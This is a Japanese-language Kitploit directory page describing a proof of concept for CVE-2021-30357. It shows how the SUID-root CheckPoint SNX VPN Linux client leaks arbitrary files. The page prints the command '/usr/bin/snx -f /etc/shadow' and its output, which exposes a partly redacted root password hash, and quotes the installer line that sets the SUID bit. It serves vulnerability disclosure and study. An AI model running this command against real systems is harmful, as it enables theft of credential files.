Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-30357_CheckPoint_SNX_VPN_PoC — CheckPoint SNX VPN Linux Client を介した特権ファイル読み取りの概念実証 | Kitploit
ツール/GitHubGitHub/joaovarelas/cve-2021-30357_checkpoint_snx_vpn_poc
特権昇格脆弱性スキャナー脆弱性分析エクスプロイトペネトレーションテスト
GitHubjoaovarelas/cve-2021-30357_checkpoint_snx_vpn_poc

CVE-2021-30357_CheckPoint_SNX_VPN_PoC

CheckPoint SNX VPN Linux Client を介した特権ファイル読み取りの概念実証

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
613年前未レビュー

CVE-2021-30357_CheckPoint_SNX_VPN_PoC

CheckPoint SNX VPN Linux Client を介した特権ファイル読み取りの概念実証 (PoC)。

影響を受けるバージョン

  • CheckPointVPN_SNX_Linux_800007075.sh
  • MD5 チェックサム: 4372e9936e2dfb1d1ebcef3ed4dd7787

エクスプロイト

悪用するには、-f パラメータを使用して任意のファイルを SNX 設定として読み込むだけです。ファイルが有効な SNX 設定でない場合、エラーがスローされ構文エラーが表示され、文字列終端文字が見つかるまで (例: etc/shadow) ファイルの内容が漏えいします:

root@kitploit:~
$ /usr/bin/snx -f /etc/shadow

parsing of the file: /etc/shadow  failed: Line 1: unknown attribute 'root:$6$Mi[REDACTED]VwUSrc2ioKt.2Mex.yF.:18624:0:99999:7:::'

Valid attributes are:

   - server          SNX server to connet to
   - sslport         The SNX SSL port (if not default)
   - username        the user name

(...)

脆弱性

原因は、実行ファイル /usr/bin/snx がインストール時に設定された SETUID ビットを持ち、スーパーユーザーとして実行されることです。

特に、.sh インストールファイル (CheckPointVPN_SNX_Linux_800007075.sh) で定義されている変数 COMMAND_TO_RUN:

root@kitploit:~
[...]
COMMAND_TO_RUN="install --owner=root --group=root --mode=u=rxs,g=x,o=x snx /usr/bin/snx; install --owner=root --group=root --mode=u=rx,g=rx,o=rx snx_uninstall.sh /usr/bin/snx_uninstall; install --directory --owner=root --group=root --mode=u=rwx /etc/snx; install --directory --owner=root --group=root --mode=u=rwx /etc/snx/tmp"

パラメータ --mode=u=rxs の末尾の s が SUID ビットを設定し、その結果、実行可能バイナリが root として実行されます。

公式アドバイザリ

  • https://support.checkpoint.com/results/sk/sk173513
  • https://vrls.ws/posts/2021/06/cve-2021-30357-check-point-software-vpn-arbitrary-file-read/
ツールをダウンロード